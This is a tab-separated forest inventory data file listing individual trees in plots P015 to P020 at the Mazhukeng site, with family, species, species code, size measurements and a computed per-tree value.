Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2.5	0.4	0.00014825
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	3	1	0.000177413
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	3	1	0.000177413
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1.2	0.000379528
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1.5	0.000379528
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3.5	0.5	0.000757716
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	3.5	1.4	0.00115149
Mazhukeng	1	P015	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	1.5	3	2.5	0.000379528
Mazhukeng	1	P015	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2.5	4	1	0.00131335
Mazhukeng	1	P015	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2.5	4	3	0.00131335
Mazhukeng	1	P015	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2.5	4	1.5	0.00131335
Mazhukeng	1	P015	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5.5	2	0.00252993
Mazhukeng	1	P015	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	3	3	1	0.0013926
Mazhukeng	1	P015	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	5	4.5	1.5	0.00541185
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	6	3.5	0.00275631
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	2.5	0.00836267
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	3.5	0.00836267
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	4	0.0157184
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	7	1.5	0.0366909
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	7	3.5	0.0431948
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8	2.5	0.0230299
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	8	3	0.0418484
Mazhukeng	1	P015	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	8	3	0.0572463
Mazhukeng	1	P015	Anacardiaceae	Rhus	Rhus chinensis Mill.	RHUCHI	1	2	0.4	0.000118999
Mazhukeng	1	P015	Anacardiaceae	Rhus	Rhus chinensis Mill.	RHUCHI	2.5	4	1.2	0.00131335
Mazhukeng	1	P015	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1	3	1.5	0.000177413
Mazhukeng	1	P015	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	2	3	1.5	0.000650978
Mazhukeng	1	P015	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	3.5	3.5	1.5	0.00216433
Mazhukeng	1	P016	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	1.5	1	0.000191753
Mazhukeng	1	P016	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	1.7	1.2	0.000216911
Mazhukeng	1	P016	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	0.7	0.000989284
Mazhukeng	1	P016	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	0.3	0.0013926
Mazhukeng	1	P016	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	2	0.0013926
Mazhukeng	1	P016	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	5	8	5	0.00953817
Mazhukeng	1	P016	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	8	7	0.00953817
Mazhukeng	1	P016	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	22	9	3	0.172442
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	1.5	3	0.5	0.000379528
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	3	2	0.0013926
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	3.5	0.3	0.00115149
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	3.5	1.8	0.00162093
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	4.5	0.3	0.0014749
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	7	3	0.0157184
Mazhukeng	1	P016	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	7	0.0179278
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	0.8	0.7	0.000103239
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1	0.8	6.01228e-05
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	1.5	0.000107269
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	0.8	0.000254566
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	0.7	0.000650978
Mazhukeng	1	P016	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3.5	0.7	0.000757716
Mazhukeng	1	P016	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.5	2	1.7	0.000254566
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1.5	2	0.9	0.000254566
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	6	0.00550289
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	4	0.00550289
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	8	5	0.0179278
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	6	0.0492664
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	6.5	0.0492664
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	4	0.0492664
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	8.5	6	0.0444234
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9	8	0.0840793
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9	8	0.0840793
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	9	7	0.106325
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	9	8	0.118357
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	9	2.1	0.118357
Mazhukeng	1	P016	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	10	2	0.207931
Mazhukeng	1	P016	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6	4	0.00718464
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	4	3.5	0.00905786
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	4	3.5	0.00905786
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	5	3.5	0.0220291
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	5	1.5	0.0220291
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	3.5	0.0146119
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	7	1.5	0.0251831
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	7	6	0.0431948
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	7.5	4	0.0328428
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	4	0.0492664
Mazhukeng	1	P016	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	3.5	0.0492664
Mazhukeng	1	P016	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	5	3.8	3.5	0.00458164
Mazhukeng	1	P016	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	10	4	3	0.0176825
Mazhukeng	1	P016	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	1.6	0.8	0.000204338
Mazhukeng	1	P016	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2	1.3	0.000254566
Mazhukeng	1	P016	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	22	9	7.5	0.172442
Mazhukeng	1	P017	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.5	4.5	3	0.00277222
Mazhukeng	1	P017	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	6	5.5	0.00128845
Mazhukeng	1	P017	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	6	5.8	0.00128845
Mazhukeng	1	P017	Theaceae	Cleyera	Cleyera japonica Thunb.	CLEJAP	1.8	1.6	0.5	0.000287642
Mazhukeng	1	P017	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.1	0.3	0.1	2.19612e-05
Mazhukeng	1	P017	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.1	1.5	0.8	0.00010718
Mazhukeng	1	P017	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.6	0.2	0.000204338
Mazhukeng	1	P017	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.8	0.3	0.000151
Mazhukeng	1	P017	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	3	2.5	0.00024974
Mazhukeng	1	P017	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	3	2	0.00024974
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	7	6	0.0431948
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	9	8	0.0258628
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	10	2	0.191299
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	10	5	0.191299
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	11	8	0.024533
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	11	7	0.0315148
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	24	11	3	0.247375
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	11	5	0.267058
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	10.5	0.157128
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	9	0.157128
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	7	0.209803
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	13	8	0.0675089
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	13	3	0.207162
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	14	11	0.0607337
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	14	5	0.182891
Mazhukeng	1	P017	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	28	14	5	0.418865
Mazhukeng	1	P017	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	6	1.8	0.0101137
Mazhukeng	1	P017	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.5	7	3.5	0.00428377
Mazhukeng	1	P017	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	8	3.5	0.00627639
Mazhukeng	1	P017	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	3	4.5	4.5	0.0020762
Mazhukeng	1	P017	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	6	7.5	6.8	0.0125998
Mazhukeng	1	P017	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	4	0.00836267
Mazhukeng	1	P017	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	8	3	0.105393
Mazhukeng	1	P017	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	8	1.4	0.128419
Mazhukeng	1	P017	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	12	10	0.00935735
Mazhukeng	1	P017	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.2	0.3	0.1	2.58541e-05
Mazhukeng	1	P018	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.2	1.6	0.6	0.000419086
Mazhukeng	1	P018	Euphorbiaceae	Bridelia	Bridelia fordii Hemsl.	BRIFOR	10	7	5	0.0306851
Mazhukeng	1	P018	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	11	6	5.5	0.0315224
Mazhukeng	1	P018	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	6	7	6	0.011772
Mazhukeng	1	P018	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	10	14	12	0.0607337
Mazhukeng	1	P018	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	11	15	14	0.0777274
Mazhukeng	1	P018	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	8	1.6	0.0492664
Mazhukeng	1	P018	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	1.5	1.5	0.4	0.000191753
Mazhukeng	1	P018	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.3	0.8	0.3	7.89382e-05
Mazhukeng	1	P018	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.6	0.2	0.00013446
Mazhukeng	1	P018	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.6	0.8	0.00013446
Mazhukeng	1	P018	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8	9	6	0.0258628
Mazhukeng	1	P018	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8	9.5	6.5	0.0272774
Mazhukeng	1	P018	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	7	1.6	0.0431948
Mazhukeng	1	P018	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	8	7	0.0845033
Mazhukeng	1	P018	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	11	2.2	0.144222
Mazhukeng	1	P018	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	15	13	0.0777274
Mazhukeng	1	P018	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	11	10	9	0.0521352
Mazhukeng	1	P018	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	6	11	1.3	0.0183735
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1.5	3	1.3	0.000379528
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	4	1.2	0.00131335
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	5	4	0.00845122
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	12	6	5.5	0.03711
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	6.8	6	0.0114406
Mazhukeng	1	P018	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	7	1.4	0.00320825
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	1.2	1.8	0.6	0.000151
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	7	4.5	4	0.0101721
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	10	6	4	0.0263625
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	11	6	4	0.0315224
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	11	7	6	0.0366909
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	12	7	3	0.0431948
Mazhukeng	1	P018	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	12	7	5	0.0431948
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	4	3	0.00481906
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5	4.5	0.00600364
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	6	5	0.00718464
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	5	0.0135042
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	4.5	0.0157184
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	7	0.8	0.0656427
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8	7	0.0349983
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8	7.1	0.0349983
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	9	8	0.0258628
Mazhukeng	1	P018	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	9	7	0.0469961
Mazhukeng	1	P018	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.2	2.5	2	0.000208689
Mazhukeng	1	P018	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	2	0.6	0.00043664
Mazhukeng	1	P019	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	0.8	0.4	6.79346e-05
Mazhukeng	1	P019	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.1	1.6	0.3	0.000114214
Mazhukeng	1	P019	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.1	1.6	0.6	0.000114214
Mazhukeng	1	P019	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.1	1.8	0.8	0.000128264
Mazhukeng	1	P019	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	1.8	0.9	0.000151
Mazhukeng	1	P019	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	7	6	0.0022791
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.1	0.8	0.6	5.77057e-05
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1	0.1	8.46338e-05
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.3	1	0.3	9.83422e-05
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.2	0.2	0.000153918
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.4	1.3	0.1	0.00014633
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.3	1.5	0.2	0.000146616
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.2	1.5	0.3	0.000393274
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.6	0.2	0.00013446
Mazhukeng	1	P019	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4	0.6	0.00184878
Mazhukeng	1	P019	Ebenaceae	Diospyros	Diospyros morrisiana Hance	DIOMOR	12	10	8.5	0.0613767
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	3.5	0.00550289
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	6	0.0201917
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	7	2.2	0.0431948
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8	3.5	0.0134267
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	8	7	0.0179278
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	8	6.5	0.0572463
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	8	7	0.0572463
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	8	4.5	0.0748697
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	8	6	0.105393
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8.5	7.5	0.0142529
Mazhukeng	1	P019	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	10	8	0.0932735
Mazhukeng	1	P019	Aceraceae	Acer	Acer buergerianum Miq.	ACEBUE	6	6	5	0.0101137
Mazhukeng	1	P019	Aceraceae	Acer	Acer buergerianum Miq.	ACEBUE	12	10	3	0.0613767
Mazhukeng	1	P019	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	6	0.2	0.0101137
Mazhukeng	1	P019	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	6.5	0.2	0.0146119
Mazhukeng	1	P019	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	8	1.2	0.0134267
Mazhukeng	1	P019	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	8	8	1.6	0.0230299
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	6	0.8	0.00275631
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	5	0.0146119
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	6.5	0.011772
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	5	0.011772
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	7	1.2	0.0656427
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7.5	2	0.0168237
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8	0.8	0.0230299
Mazhukeng	1	P019	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	10	9	0.0223347
Mazhukeng	1	P019	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	7	7	6	0.0157184
Mazhukeng	1	P019	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	9	7.5	3	0.0269539
Mazhukeng	1	P019	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	10	8	6	0.0349983
Mazhukeng	1	P019	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	6	2	0.0135042
Mazhukeng	1	P020	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	2	1	0.000663557
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.5	4.5	0.3	0.00277222
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	5	3.5	0.00163619
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	6	5	0.0101137
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	7	6	0.00320825
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	7	5.5	0.011772
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	7	7	5.5	0.0157184
Mazhukeng	1	P020	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	7.5	6.5	0.00588983
Mazhukeng	1	P020	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.4	1.5	0.5	0.000168479
Mazhukeng	1	P020	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.3	2.5	0.3	0.000242491
Mazhukeng	1	P020	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	3	0.2	0.00024974
Mazhukeng	1	P020	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	3	1.2	0.000989284
Mazhukeng	1	P020	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8	3.5	3	0.0102016
Mazhukeng	1	P020	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	6.5	5	0.007774
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2.5	3.5	1.3	0.00115149
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	5	1.7	0.00230323
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	5	2.8	0.0220291
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	6	2	0.00275631
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6.5	6	0.0146119
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	6.5	6	0.0610219
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7	6	0.011772
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7	3.5	0.011772
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6.5	7	6	0.0136787
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	6.5	0.0201917
